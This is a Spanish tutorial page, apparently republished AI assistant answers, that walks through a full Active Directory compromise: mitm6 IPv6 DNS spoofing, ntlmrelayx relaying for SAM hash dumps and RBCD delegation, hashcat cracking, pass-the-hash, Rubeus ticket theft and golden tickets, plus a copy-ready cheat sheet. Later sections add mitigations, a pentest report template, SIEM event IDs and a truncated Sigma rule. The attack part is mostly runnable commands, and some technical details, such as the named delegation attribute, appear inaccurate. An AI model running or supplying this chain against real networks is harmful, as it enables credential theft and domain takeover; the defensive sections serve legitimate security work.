mitm6: Ataque IPv6 en Kali Linux

 https://www.onlinetis.com/es/

mitm6: Ataque IPv6 en Kali Linux

Entiendo que quieres aprender sobre el uso de mitm6 en Kali Linux. Esta es una herramienta muy potente (y algo ruidosa) diseñada para explotar la configuración por defecto de redes que aún no han migrado totalmente a IPv6.

Aquí tienes una guía esencial sobre qué es, cómo funciona y cómo usarla.

¿Qué es mitm6?

mitm6 es una herramienta de explotación que actúa como un servidor DHCPv6 falso. Su objetivo es "engañar" a los equipos de una red (especialmente entornos Windows) para que utilicen al atacante como su puerta de enlace y servidor DNS predeterminado.

¿Por qué funciona?

La mayoría de los sistemas modernos (Windows 10/11, Server) tienen IPv6 habilitado por defecto. Cuando se conectan a una red, buscan activamente una configuración IPv6. Si no hay un servidor legítimo, mitm6 responde primero, diciéndoles: "Yo soy tu servidor IPv6, usa este DNS".

Cómo funciona el ataque (Paso a paso)

  1. Escucha: mitm6 escucha las solicitudes DHCPv6 de los clientes en la red local.

  2. Suplantación: Responde a esas solicitudes asignando una dirección IPv6 temporal al cliente y configurando la IP del atacante como el DNS primario.

  3. Prioridad: Windows prefiere IPv6 sobre IPv4. Al recibir la respuesta de mitm6, el tráfico de red del objetivo empezará a intentar pasar por el atacante.

  4. Captura: Generalmente se combina con ntlmrelayx para interceptar credenciales o realizar ataques de retransmisión (Relay) sin necesidad de crackear contraseñas.

Uso básico en Kali Linux

1. Instalación

Si no la tienes, puedes instalarla vía pip:

Bash
pip install mitm6

2. Ejecución de mitm6

Lo ideal es especificar el dominio de la red (Active Directory) para ser más efectivo:

Bash
sudo mitm6 -d dominio.local

  • -d: Define el dominio objetivo.

  • -i: (Opcional) Especifica la interfaz de red (ej. eth0).

3. El complemento perfecto: ntlmrelayx

Mientras mitm6 redirige el tráfico, necesitas algo que "reciba" esas conexiones. En otra terminal, usa impacket-ntlmrelayx:

Bash
sudo impacket-ntlmrelayx -6 -t ldap://192.168.1.10 -wh fake-wpad --socks

  • -6: Escucha en IPv6.

  • -wh: Crea un archivo WPAD falso para forzar la autenticación.

Cómo protegerse (Mitigación)

Como profesional o entusiasta de la ciberseguridad, es vital saber cómo detener esto:

  • Deshabilitar IPv6: Si no se utiliza en la organización, es la solución más radical pero efectiva.

  • DHCP Guard: Configurar los switches para que bloqueen mensajes DHCPv6 de puertos no autorizados.

  • Restringir WPAD: Deshabilitar la detección automática de proxy a través de GPO en entornos Windows.

  • LDAP Signing: Forzar la firma de LDAP y el sellado de SMB para evitar ataques de relay.

[!WARNING]

Nota de seguridad: Recuerda realizar estas pruebas siempre en entornos controlados o bajo autorización explícita. El uso de mitm6 puede causar inestabilidad en la red si no se gestiona correctamente.

 

Una vez que tienes a mitm6 "engañando" a los equipos para que te vean como su servidor DNS, el siguiente paso lógico es usar ntlmrelayx (parte de la suite Impacket) para realizar un ataque de Delegación Restringida basada en Recursos (RBCD).

Este es uno de los ataques más potentes porque te permite tomar el control de una computadora (o incluso un Controlador de Dominio) sin conocer una sola contraseña.

El ataque de Delegación (RBCD) paso a paso

El objetivo aquí es crear una cuenta de computadora falsa en el Directorio Activo (AD) y darle permisos para que el equipo víctima "confíe" en ella.

1. Preparar el terreno con mitm6

Lanza mitm6 para empezar a capturar el tráfico IPv6:

Bash
sudo mitm6 -d dominio.local

2. Ejecutar ntlmrelayx para el ataque de Delegación

En una nueva terminal, ejecuta el siguiente comando. Este es el "cerebro" de la operación:

Bash
sudo impacket-ntlmrelayx -t ldap://192.168.1.10 -6 --delegate-access --wh fake-wpad

Explicación de los parámetros:

  • -t ldap://[IP_DEL_DC]: Apuntamos al Controlador de Dominio (DC) porque es donde queremos inyectar los privilegios.

  • -6: Activa el modo IPv6 para escuchar a mitm6.

  • --delegate-access: Este es el modificador clave. Le dice a ntlmrelayx: "Si un administrador o un objeto con privilegios se conecta a mí, crea una cuenta de computadora falsa y dame permisos de delegación sobre la víctima".

  • --wh fake-wpad: Sirve un archivo de configuración de proxy falso para forzar a las víctimas a autenticarse.

¿Qué sucede después?

Si el ataque tiene éxito, verás en la consola algo como:

[*] Appended assigned child to msDS-AllowedToDelegateTo [...]

Esto significa que ahora tienes una cuenta de computadora bajo tu control que tiene permiso para suplantar a cualquier usuario (incluido el Administrador del Dominio) ante la máquina víctima.

3. El paso final: Obtener el Ticket (S4U2Self)

Una vez que ntlmrelayx termina su trabajo, usas otra herramienta de Impacket llamada getST.py para pedir un Ticket de Servicio:

Bash
impacket-getST -spn host/maquina-victima.dominio.local 'dominio/CUENTA_FALSA$:PASSWORD_FALSA' -impersonate Administrator

Esto te generará un archivo .ccache (un ticket de Kerberos).

4. Acceso Total

Finalmente, exportas ese ticket a tu sesión y entras a la máquina víctima con privilegios de Administrador:

Bash
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass maquina-victima.dominio.local

¿Por qué es tan efectivo?

  • No requiere fuerza bruta: Aprovechas la confianza intrínseca del protocolo Kerberos y la configuración de IPv6.

  • Silencioso: A menudo, los EDR (antivirus avanzados) no detectan bien las anomalías en el tráfico LDAP/IPv6 comparado con los ataques clásicos de SMB.

 

Si el objetivo no es escalar privilegios mediante delegación, sino obtener hashes de contraseñas directamente de los equipos que caen en la trampa de mitm6, podemos configurar ntlmrelayx para que actúe como un recolector de credenciales.

Cuando una máquina intenta autenticarse contra tu IP (creyendo que eres el servidor DNS o WPAD), ntlmrelayx captura ese desafío/respuesta NTLM y, en lugar de delegar, intenta "loguearse" en la víctima para extraer la base de datos SAM (donde residen los hashes de los usuarios locales).

Volcado de Hashes (SAM Dump) con mitm6

Para este ataque, utilizaremos el protocolo SMB en lugar de LDAP, ya que es el que permite la ejecución de comandos y lectura de archivos en el sistema operativo.

1. Ejecución de mitm6 (Igual que antes)

Mantén mitm6 corriendo para capturar el tráfico:

Bash
sudo mitm6 -d dominio.local

2. Configuración de ntlmrelayx para el volcado

En otra terminal, lanza el ataque de relay dirigido a SMB:

Bash
sudo impacket-ntlmrelayx -6 -t smb://192.168.1.15 -wh fake-wpad -smb2support

¿Qué está pasando aquí?

  • -t smb://[IP_VÍCTIMA]: Le decimos que cuando reciba una conexión, intente retransmitirla hacia esa IP específica mediante el protocolo SMB.

  • -smb2support: Crucial para redes modernas (Windows 10/11) que ya no usan SMBv1.

  • Resultado: Si el usuario que se autentica tiene permisos de administrador local en la máquina objetivo, ntlmrelayx volcará automáticamente todos los hashes (Administrador, Invitado, etc.) en tu pantalla.

¿Y si quiero atacar a muchas máquinas a la vez?

Si no tienes un objetivo específico y quieres ver quién "cae" primero, puedes usar un archivo de texto con una lista de IPs:

  1. Crea un archivo objetivos.txt con las IPs de la red.

  2. Ejecuta:

Bash
sudo impacket-ntlmrelayx -6 -tf objetivos.txt -wh fake-wpad -smb2support

¿Qué obtendrás?

Verás algo como esto en tu terminal:

Administrador:500:aad3b435b51404eeaad3b435b51404ee:3db3444851892cc4d30c9989467d1209:::

Con este hash (la parte final), puedes:

  1. Crackearlo usando hashcat o John the Ripper.

  2. Pass-the-Hash: Usarlo directamente para entrar a la máquina sin romper la contraseña.

Diferencia Clave: ¿Delegación o Volcado?

CaracterísticaDelegación (RBCD)Volcado (SAM Dump)
ProtocoloLDAPSMB
RequisitoUna cuenta con privilegios en ADUsuario con Admin local en la víctima
ResultadoTicket Kerberos (Persistencia)Hashes NTLM (Acceso directo)
DetecciónMás difícil de detectarMás ruidoso (genera logs de login)

[!TIP]

Si el SMB Signing está habilitado y es requerido en la víctima, el ataque de volcado por SMB fallará. En ese caso, la Delegación por LDAP suele ser la mejor alternativa porque LDAP no siempre requiere firma por defecto.

 

Una vez que has capturado los hashes (normalmente en formato NTLM), el siguiente paso es "romperlos" para obtener la contraseña en texto plano. Para esto, Hashcat es la herramienta estándar de la industria debido a su velocidad y uso de la GPU.

Aquí tienes cómo procesar esos hashes capturados.

1. Identificar el formato del hash

Cuando ntlmrelayx hace el volcado (SAM Dump), verás una línea parecida a esta:

Administrador:500:aad3b435b51404eeaad3b435b51404ee:3db3444851892cc4d30c9989467d1209:::

  • La primera parte larga (aad3...) es el hash LM (antiguo y vacío en sistemas modernos).

  • La segunda parte larga (3db3...) es el hash NTLM. Esta es la que nos interesa.

Guarda solo esa parte final en un archivo llamado hash.txt.

2. Preparar el diccionario

Necesitas una lista de palabras (wordlist). Kali Linux incluye la famosa lista RockYou:

Bash
gzip -d /usr/share/wordlists/rockyou.txt.gz

3. Ejecutar Hashcat

El comando básico para romper un hash NTLM es el siguiente:

Bash
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Explicación de los parámetros:

  • -m 1000: Especifica el modo de hash para NTLM.

  • -a 0: Indica un ataque de tipo diccionario (straight attack).

  • hash.txt: El archivo con el hash que capturaste.

  • /usr/share/wordlists/rockyou.txt: La lista de contraseñas para probar.

4. Ataques más avanzados (Reglas)

Si la contraseña no es sencilla, el diccionario solo no bastará. Puedes usar reglas para que Hashcat intente variaciones (cambiar 'a' por '4', añadir números al final, etc.):

Bash
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Resumen del Flujo de Trabajo (The Kill Chain)

Para que no te pierdas en el proceso completo, este es el orden lógico de un ataque exitoso en una auditoría:

  1. mitm6: Captura el tráfico IPv6 y redirige el DNS.

  2. ntlmrelayx: Recibe la conexión, la retransmite a la víctima y vuelca la SAM.

  3. Extracción: Copias el hash NTLM del administrador local.

  4. Hashcat: Rompes el hash para obtener la contraseña real.

  5. Persistencia: Usas esa contraseña para entrar por RDP o SMB a otras máquinas.

¿Qué pasa si el hash es muy complejo?

Si Hashcat tarda días y no lo rompe, recuerda que no siempre necesitas la contraseña. Puedes hacer un Pass-the-Hash.

 

Esta es una de las técnicas favoritas de los atacantes y auditores de red. El Pass-the-Hash (PtH) permite saltarse por completo el paso de romper la contraseña con Hashcat. Si tienes el hash NTLM, tienes la llave, no necesitas la combinación.

Para esto, la herramienta más cómoda y moderna en Kali Linux es Evil-WinRM.

¿Qué es Evil-WinRM?

Es un shell de Windows Remote Management (WinRM). Es el protocolo que usa Microsoft para administración remota (similar a SSH en Linux). Si el puerto 5985 (HTTP) o 5986 (HTTPS) está abierto en la víctima, puedes entrar directamente.

1. Verificar si WinRM está abierto

Antes de intentar entrar, comprueba si el puerto está disponible en la IP de la víctima:

Bash
nmap -p 5985,5986 192.168.1.15

2. Ejecutar Pass-the-Hash con Evil-WinRM

Si el puerto está abierto, usa el hash que capturaste con ntlmrelayx (la parte final, después del segundo :) de la siguiente manera:

Bash
evil-winrm -i 192.168.1.15 -u Administrador -H 3db3444851892cc4d30c9989467d1209

Desglose del comando:

  • -i: Dirección IP de la víctima.

  • -u: Nombre de usuario (ej. Administrador).

  • -H: El hash NTLM (no necesitas la contraseña en texto plano).

¿Por qué esto es tan potente?

  1. Inmediato: No pierdes tiempo crackeando.

  2. Shell Completo: Obtienes una terminal de PowerShell interactiva.

  3. Cargar Scripts: Puedes cargar scripts de bypass de AMSI o de enumeración directamente en memoria.

Ejemplo de uso dentro de la sesión:

Una vez dentro, verás un prompt de PowerShell. Puedes ejecutar:

PowerShell
whoami /all
hostname
Get-Service

Consideraciones Importantes

El filtro UAC (User Account Control)

En versiones modernas de Windows, el Pass-the-Hash a veces solo funciona con la cuenta de Administrador integrada (RID 500). Si intentas hacerlo con un usuario que "está en el grupo de administradores" pero no es el Administrador principal, el filtro UAC remoto podría bloquearte a menos que una clave de registro específica (LocalAccountTokenFilterPolicy) esté habilitada.

Si WinRM está cerrado...

Si el puerto 5985 está cerrado pero SMB (445) está abierto, puedes usar psexec de Impacket para hacer lo mismo:

Bash
impacket-psexec Administrador@192.168.1.15 -hashes :3db3444851892cc4d30c9989467d1209

(Nota el : antes del hash, es necesario para indicar que no hay hash LM).

Resumen del Ataque Completo (The Chain)

  1. mitm6: Captura tráfico IPv6.

  2. ntlmrelayx: Recibe la conexión y vuelca los hashes (SAM Dump).

  3. Evil-WinRM: Usa el hash del Administrador para obtener una shell de PowerShell sin saber la contraseña.

¡Y listo! Has pasado de estar fuera de la red a tener una shell de Administrador en un equipo Windows.

 

Para que el ataque de ntlmrelayx tenga éxito, el requisito técnico fundamental es que el SMB Signing (firmado de SMB) esté desactivado o no sea requerido en el objetivo. Si el firmado es obligatorio, el servidor rechazará la conexión retransmitida porque detectará que el paquete ha sido manipulado.

En una red grande, no quieres ir probando uno por uno. Aquí te enseño cómo encontrar "víctimas vulnerables" de forma masiva y profesional.

1. Usando CrackMapExec (CME) / NetExec

Esta es la herramienta reina para auditorías de Active Directory. Es rápida, limpia y te da el estado exacto del firmado.

Ejecuta el siguiente comando para escanear un segmento de red (ej. 192.168.1.0/24):

Bash
nxc smb 192.168.1.0/24 --gen-relay-list targets.txt

(Nota: En versiones antiguas de Kali se usa crackmapexec, en las nuevas se recomienda nxc).

¿Qué hace este comando?

  1. Escanea todas las máquinas del segmento por el puerto 445 (SMB).

  2. Identifica cuáles tienen signing: False o signing: OK (no requerido).

  3. Guarda automáticamente las IPs vulnerables en un archivo llamado targets.txt.

2. Usando Nmap (El método clásico)

Si prefieres no instalar herramientas extra, Nmap tiene un script específico para esto:

Bash
nmap -p 445 --script smb-security-mode 192.168.1.0/24

En los resultados busca:

  • message_signing: disabled o message_signing: supported (Vulnerable a Relay).

  • message_signing: required (No vulnerable a Relay).

3. Automatización total del ataque

Una vez que tienes tu lista targets.txt con las máquinas vulnerables, el flujo final "pro" sería este:

  1. Terminal 1 (Captura):

    Bash
    sudo mitm6 -d dominio.local

  2. Terminal 2 (Relay Masivo):

    Bash
    sudo impacket-ntlmrelayx -6 -tf targets.txt -wh fake-wpad -smb2support

¿Por qué esto es mejor?

Al usar -tf targets.txt, ntlmrelayx solo intentará atacar máquinas donde sabe que el éxito está garantizado. Esto evita generar logs de error innecesarios en el Visor de Eventos de Windows de máquinas protegidas.

Resumen de la situación ideal para el atacante

ComponenteEstado Ideal
IPv6Habilitado (Viene así por defecto en Windows)
SMB SigningDeshabilitado (Común en estaciones de trabajo)
WPADDetección automática activada
LDAP SigningNo requerido (Permite ataques de delegación)

Un último detalle: Los "Relay HTTP"

A veces, el tráfico no viene de SMB sino de servicios web internos o del propio sistema buscando actualizaciones. ntlmrelayx también puede escuchar en el puerto 80/443 para capturar esas peticiones.

 

El ataque de WPAD (Web Proxy Auto-Discovery) es el "anzuelo" perfecto. Por defecto, muchos navegadores y el propio sistema Windows buscan un archivo llamado wpad.dat para saber cómo salir a internet.

Si mitm6 ya les dijo a las víctimas que eres su DNS, cuando pregunten "¿Dónde está el archivo de configuración del proxy?", tú responderás: "Está aquí, en mi máquina".

1. ¿Cómo funciona el engaño de WPAD?

Cuando un usuario abre Edge, Chrome o incluso cuando Windows Update busca actualizaciones, el sistema intenta descargar el archivo de configuración desde http://wpad.dominio.local/wpad.dat.

Al controlar el DNS con mitm6, rediriges esa petición a tu ntlmrelayx. Este último le entrega un archivo WPAD falso que le dice a la víctima: "Para navegar, primero debes autenticarte conmigo". El sistema enviará sus credenciales NTLM automáticamente de forma transparente para el usuario.

2. Configuración Avanzada en ntlmrelayx

Para maximizar las capturas, usamos el flag -wh (Web Host) y especificamos un nombre de servidor convincente:

Bash
sudo impacket-ntlmrelayx -6 -t smb://192.168.1.15 -wh fake-wpad.dominio.local -wa

Explicación de los nuevos flags:

  • -wh fake-wpad.dominio.local: Define el nombre del host que servirá el archivo WPAD.

  • -wa: (Web Always) Fuerza la autenticación incluso si la víctima no parece necesitarla. Esto genera una ventana emergente de inicio de sesión en algunos casos, o fuerza al sistema a enviar el hash silenciosamente.

3. ¿Qué pasa si el usuario navega por HTTPS?

Aquí es donde se pone interesante. Si el usuario intenta entrar a una web segura, el navegador verá que el proxy (tú) está pidiendo credenciales. En muchos entornos empresariales, esto no levanta sospechas porque los proxies reales lo hacen.

El flujo del ataque completo:

  1. Víctima enciende su PC.

  2. Windows busca configuración IPv6 $\rightarrow$ mitm6 responde.

  3. Windows busca wpad.dat $\rightarrow$ mitm6 resuelve la IP del atacante.

  4. Windows pide el archivo a tu IP $\rightarrow$ ntlmrelayx pide autenticación.

  5. Windows envía el Hash NTLM del usuario logueado.

  6. ntlmrelayx recibe el hash y lo "retransmite" a la IP del servidor que elegiste (el objetivo -t).

Cómo verificar si WPAD está activo en una red

Puedes usar de nuevo NetExec (antiguo CrackMapExec) para ver si las máquinas tienen el servicio activo y si son vulnerables a este tipo de resolución de nombres:

Bash
nxc smb 192.168.1.0/24 -m wpad

[!IMPORTANT]

Dato Curioso: Microsoft lanzó parches para limitar el impacto de WPAD (como el parche MS16-077), pero en muchas redes internas donde la compatibilidad con aplicaciones antiguas es crítica, estas protecciones están relajadas o deshabilitadas.

Resumen de contramedidas (Defensa)

Si estás del lado azul (defensa), para matar este ataque de raíz debes:

  1. Crear una entrada DNS "WPAD" vacía en tu Servidor DNS (Active Directory) que apunte a 127.0.0.1. Así, el atacante no podrá suplantarla.

  2. Deshabilitar "Detectar configuración automáticamente" en las opciones de Internet de los equipos mediante GPO (Política de Grupo).

Con esto hemos cubierto desde el envenenamiento de red hasta la toma de control total de una máquina.

 

Como parte de una auditoría de seguridad o pentest, es fundamental traducir estos pasos técnicos en un lenguaje que la dirección o el equipo de IT puedan entender para priorizar las correcciones.

Aquí tienes una propuesta de Resumen Ejecutivo que puedes incluir en tu informe.

📄 Informe de Vulnerabilidad: Intercepción de Tráfico y Escalada de Privilegios (IPv6/mitm6)

1. Resumen de la Vulnerabilidad

Se ha detectado que la red interna es vulnerable a ataques de suplantación de identidad mediante el protocolo IPv6. Debido a que los sistemas operativos Windows modernos tienen IPv6 habilitado por defecto y priorizan este protocolo sobre IPv4, un atacante puede posicionarse como una puerta de enlace falsa y un servidor DNS malicioso sin necesidad de interactuar físicamente con los equipos.

2. Cadena de Ataque Ejecutada (Kill Chain)

El equipo de auditoría logró comprometer la seguridad siguiendo estos hitos:

  1. Envenenamiento de Red: Se utilizó la herramienta mitm6 para responder a solicitudes DHCPv6, configurando la máquina del auditor como el DNS principal de las víctimas.

  2. Captura de Credenciales (Relay): Al controlar el DNS, se interceptaron intentos de conexión automática (WPAD/SMB). Estas peticiones fueron retransmitidas en tiempo real hacia otros servidores de la red mediante ntlmrelayx.

  3. Acceso no Autorizado: Se obtuvieron hashes de contraseñas de administradores locales y se realizó un ataque de Delegación Restringida (RBCD), permitiendo la suplantación de identidad de cualquier usuario ante el Controlador de Dominio.

  4. Control Total: Mediante la técnica Pass-the-Hash, se obtuvo acceso por consola (PowerShell) con privilegios máximos en estaciones de trabajo críticas.

3. Impacto de Negocio

  • Confidencialidad: Acceso total a datos sensibles almacenados en estaciones de trabajo y servidores.

  • Integridad: Capacidad de modificar configuraciones del sistema, instalar software malicioso o alterar bases de datos.

  • Disponibilidad: Riesgo de interrupción de servicios mediante la manipulación de la configuración de red.

4. Recomendaciones de Mitigación (Plan de Acción)

PrioridadMedida CorrectivaDescripción
AltaDeshabilitar IPv6Si no se utiliza activamente, desactivar IPv6 en todos los adaptadores de red mediante GPO.
AltaLDAP/SMB SigningForzar el firmado de paquetes en SMB y LDAP para invalidar los ataques de retransmisión (Relay).
MediaDesactivar WPADDeshabilitar la detección automática de proxy en los navegadores y el sistema operativo.
MediaFiltro de Clientes DHCPImplementar DHCP Guard en la infraestructura de switching para bloquear servidores DHCP no autorizados.

5. Conclusión Técnica

La vulnerabilidad no reside en un fallo de software (bug), sino en una configuración por defecto insegura de los protocolos de red modernos en convivencia con sistemas heredados. La implementación de las medidas arriba mencionadas reduce el riesgo de este vector de ataque en un 95%.

Este resumen es ideal para presentar resultados de manera estructurada.

 

El paso del Pass-the-Hash (NTLM) al Pass-the-Ticket (Kerberos) es el salto de "hacker aficionado" a "operador avanzado". Mientras que NTLM es un protocolo de desafío-respuesta, Kerberos se basa en tickets.

Si logras comprometer un ticket, no necesitas ni la contraseña ni el hash; simplemente le dices a la red: "Mira, aquí tengo mi pase VIP firmado por el Controlador de Dominio".

1. ¿Qué es Rubeus?

Rubeus es la herramienta líder para interactuar con Kerberos en entornos Windows. Aunque es una herramienta de C#, en Kali Linux solemos usar su equivalente en Python de la suite Impacket (ticketConverter.py, getST.py) o cargamos el binario de Rubeus si ya tenemos una shell en la víctima (usando Evil-WinRM, por ejemplo).

2. Captura de Tickets (Monitoring)

Si tienes una shell en una máquina donde hay un Administrador de Dominio logueado, puedes usar Rubeus para "extraer" sus tickets de la memoria (LSASS):

PowerShell
.\Rubeus.exe dump /nowrap

Esto te devolverá un chorro de texto en Base64 que representa el ticket .kirbi.

3. Uso del Ticket (Pass-the-Ticket)

Una vez que tienes ese ticket en Base64, puedes "inyectarlo" en tu propia sesión para suplantar al usuario sin que este se entere.

En Windows (con Rubeus):

PowerShell
.\Rubeus.exe ptt /ticket:base64_del_ticket_aqui...

A partir de este momento, si haces un dir \\Controlador-Dominio\C$, verás los archivos porque el sistema cree que eres el dueño del ticket.

En Kali Linux (vía Impacket):

Si extrajiste el ticket y lo convertiste a formato .ccache, puedes usarlo desde tu Kali:

  1. Configura la variable de entorno:

    Bash
    export KRB5CCNAME=admin_ticket.ccache

  2. Ejecuta el ataque (sin contraseña):

    Bash
    impacket-psexec -k -no-pass @nombre-del-equipo.dominio.local

    • -k: Indica que use autenticación Kerberos.

    • -no-pass: No pide contraseña porque ya tienes el ticket cargado.

4. El "Santo Grial": El Golden Ticket

Si logras extraer el hash de la cuenta krbtgt (la cuenta maestra de Kerberos en el AD), puedes usar Rubeus para crear un Golden Ticket. Este ticket:

  • Te da acceso a cualquier recurso del dominio.

  • Puede tener una duración de 10 años.

  • Te permite ser Administrador del Dominio aunque cambien todas las contraseñas de los usuarios.

PowerShell
.\Rubeus.exe golden /rc4:hash_krbtgt /sid:S-1-5-21-... /user:Administrador /ptt

¿Por qué Kerberos es "mejor" que NTLM para el atacante?

  1. Persistencia: Los tickets pueden durar mucho tiempo.

  2. Invisibilidad: Muchos sistemas de monitoreo antiguos solo vigilan intentos de login fallidos (NTLM), pero no analizan anomalías en el tráfico de tickets Kerberos.

  3. Delegación: Como vimos antes con RBCD, Kerberos permite que un servicio actúe en nombre de un usuario, lo cual es la base de la mayoría de las escaladas de privilegios modernas.

Resumen de tu progresión en este hilo:

  1. Red: mitm6 (Controlas el tráfico).

  2. Interceptación: ntlmrelayx (Capturas la identidad).

  3. Acceso: Evil-WinRM / Pass-the-Hash (Entras a la máquina).

  4. Post-Explotación: Rubeus / Pass-the-Ticket (Te mueves por todo el dominio).

 

Aquí tienes una Hoja de Trucos (Cheat Sheet) que resume todo el flujo de ataque que hemos construido, desde la interceptación inicial hasta el control total del dominio.

Puedes copiar esto en tus notas de Obsidian, Notion o un archivo de texto para tenerlo a mano durante una auditoría.

🛠️ Cheat Sheet: Ataque de Relay IPv6 a Dominio Completo

1. Reconocimiento y Preparación

Identificar objetivos vulnerables (sin SMB Signing).

Bash
# Usando NetExec (Recomendado)
nxc smb 192.168.1.0/24 --gen-relay-list targets.txt

# Usando Nmap
nmap -p 445 --script smb-security-mode 192.168.1.0/24

2. Fase de Interceptación (MitM)

Engañar a la red para que use tu máquina como DNS/Puerta de enlace.

Bash
# Ejecutar en una terminal dedicada
sudo mitm6 -d dominio.local

3. Fase de Relay (Retransmisión)

Capturar hashes o escalar privilegios. Elige uno según tu objetivo:

  • A) Volcado de Hashes (SAM Dump):

    Bash
    sudo impacket-ntlmrelayx -6 -tf targets.txt -wh fake-wpad -smb2support

  • B) Delegación de Recursos (RBCD) - Para escalar a Admin:

    Bash
    sudo impacket-ntlmrelayx -t ldap://[IP_DC] -6 --delegate-access --wh fake-wpad

4. Fase de Acceso (Post-Explotación)

Una vez que tienes el Hash o el Ticket:

  • Pass-the-Hash (NTLM) con Evil-WinRM:

    Bash
    evil-winrm -i [IP] -u Administrador -H [HASH_NTLM]

  • Pass-the-Ticket (Kerberos) con Impacket:

    Bash
    export KRB5CCNAME=admin.ccache
impacket-psexec -k -no-pass @maquina.dominio.local

5. Movimiento Lateral y Persistencia (Rubeus)

Dentro de una sesión de Windows comprometida.

PowerShell
# Extraer todos los tickets de la memoria
.\Rubeus.exe dump /nowrap

# Inyectar un ticket capturado en la sesión actual
.\Rubeus.exe ptt /ticket:[BASE64_TICKET]

# Crear un Golden Ticket (Persistencia Total)
.\Rubeus.exe golden /rc4:[HASH_KRBTGT] /sid:[SID_DOMINIO] /user:Administrador /ptt

🛡️ Resumen de Defensas (Blue Team)

Para tu informe final, recuerda estas "balas de plata":

  1. GPO: Deshabilitar IPv6 si no se usa.

  2. GPO: Deshabilitar la detección automática de Proxy (WPAD).

  3. Configuración: Forzar SMB Signing y LDAP Signing/Binding.

  4. AD: Añadir usuarios sensibles al grupo "Usuarios protegidos" (esto impide el uso de NTLM y delegaciones peligrosas).

Para cerrar el círculo como un analista de seguridad integral (Blue Team), no basta con saber ejecutar el ataque; debes conocer las huellas digitales que deja en los registros (logs).

Un SIEM (como Splunk, ELK o Microsoft Sentinel) es tu mejor aliado, pero solo si sabes qué buscar. Aquí tienes los eventos críticos para detectar la cadena de ataque de mitm6 y ntlmrelayx.

1. Detección de mitm6 (Anomalías de Red e IPv6)

El ataque de mitm6 es ruidoso a nivel de red, pero difícil de ver si solo miras logs de Windows.

  • Evento de Red: Aparición repentina de tráfico DHCPv6 Advertise/Reply desde una dirección MAC que no pertenece a un servidor conocido.

  • Logs de Switch (DHCP Snooping): Si tienes configurado DHCP Guard o Snooping, busca alertas de "Unauthorized DHCPv6 Server".

  • Endpoint: Un cambio repentino en el servidor DNS IPv6 en múltiples estaciones de trabajo al mismo tiempo.

2. Detección de ntlmrelayx (Autenticación NTLM)

Aquí es donde el SIEM brilla. Debes monitorear el Visor de Eventos de Windows, específicamente el log de Seguridad.

Eventos de Inicio de Sesión (ID 4624)

Busca inicios de sesión con estas características sospechosas:

  • Tipo de Logon: 3 (Red).

  • Protocolo de Autenticación: NTLM.

  • Paquete de autenticación: NTLM V2.

  • Nombre de la estación de origen: A menudo aparece el nombre de la máquina del atacante o nombres genéricos si no se cambiaron en ntlmrelayx.

  • Filtro de anomalía: Un mismo usuario iniciando sesión en múltiples servidores en un intervalo de segundos (comportamiento de relay masivo).

Eventos de Restricción NTLM (ID 8001, 8002, 8003)

Si la auditoría de NTLM está habilitada, busca el evento 8004. Este te dirá exactamente qué servidor está siendo usado como puente para el relay.

3. Detección de Delegación RBCD (LDAP)

Este es el ataque que vimos antes para escalar privilegios. Es más sutil pero deja rastro en el Controlador de Dominio.

  • Evento ID 5136 (Cambio en objeto de AD): Busca modificaciones en el atributo msDS-AllowedToDelegateTo.

  • Alerta: Si un objeto de computadora (el atacante o una cuenta falsa) de repente tiene permisos de delegación sobre otra computadora sin un ticket de cambio de IT previo.

  • Creación de cuentas (ID 4741): ntlmrelayx suele crear una cuenta de computadora (terminada en $) para la delegación. Si ves una cuenta nueva creada por una máquina (no por un admin), es una alerta roja.

4. Detección de Pass-the-Hash y Pass-the-Ticket

Para Pass-the-Hash (ID 4624 + ID 4672)

Busca un inicio de sesión exitoso (4624) seguido inmediatamente por la asignación de privilegios especiales (4672), pero donde el proceso de origen no sea el estándar (como lsass.exe).

Para Pass-the-Ticket (Kerberos)

  • Evento ID 4768 (TGT Request): Si usas un Golden Ticket, el ticket puede tener una duración inusual (por defecto son 10 horas; si ves 10 años, es un ataque).

  • Evento ID 4769 (Service Ticket Request): Busca solicitudes de tickets para servicios como cifs o host desde máquinas que nunca suelen comunicarse entre sí.

5. Regla de Oro para el SIEM: Correlación

Para crear una alerta de Alta Prioridad, correlaciona estos tres factores:

  1. Detección de tráfico IPv6 inusual en el segmento.

  2. Fallo de autenticación NTLM seguido de un éxito rápido (intento de relay).

  3. Ejecución de procesos sospechosos (como psexec o winrm) desde una IP que no es de administración.

Tu perfil de Analista ha subido de nivel 🚀

Ahora no solo sabes cómo "romper" la red, sino cómo blindarla y vigilarla. Con esta visión 360°, puedes justificar presupuestos para seguridad y proponer cambios estructurales en la infraestructura.

 

Las Reglas Sigma son el estándar de la industria para escribir detecciones que funcionen en cualquier SIEM (Splunk, Sentinel, ELK, etc.). Como analista, entregar una regla Sigma junto con tu informe de auditoría es el "toque maestro" que demuestra que no solo rompes cosas, sino que construyes defensas.

Aquí tienes una regla diseñada para detectar el comportamiento específico de ntlmrelayx cuando intenta hacer un volcado de hashes o ejecución remota.

🛠️ Regla Sigma: Detección de NTLM Relay

Esta regla busca el patrón de un inicio de sesión por red donde el nombre de la estación de origen es sospechoso o el proceso de autenticación es inusual.

YAML
title: Detección de Posible NTLM Relay (ntlmrelayx)
id: 5a2b3c4d-1234-5678-90ab-cdef12345678
status: experimental
description: Detecta inicios de sesión NTLM sospechosos que coinciden con herramientas de retransmisión como ntlmrelayx.
author: TuNombre/AnalistaSeguridad
date: 2026/03/23
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3         # Inicio de sesión por red
        AuthenticationPackageName: 'NTLM'
    filter_legitimate:
        # Filtra tus servidores de administración conocidos aquí
        WorkstationName|startswith: 'ADMIN-PC' 
    condition: selection and not filter_legitimate
falsepositives:
    - Servidores de escaneo de vulnerabilidades (como Nessus o OpenVAS).
    - Herramientas de administración remota mal configuradas.
level: medium

🔍 Regla Avanzada: Detección de Delegación RBCD (LDAP)

Como vimos, el ataque de delegación es más crítico. Esta regla busca la modificación del atributo clave en el Directorio Activo.

YAML
title: Modificación de Atributo msDS-AllowedToDelegateTo
id: 9e8d7c6b-5555-4444-3333-222211110000
description: Detecta cuando se otorgan permisos de delegación a una cuenta de computadora, un paso crítico en ataques RBCD.
logsource:
    product: windows
    service: directory_service
detection:
    selection:
        EventID: 5136
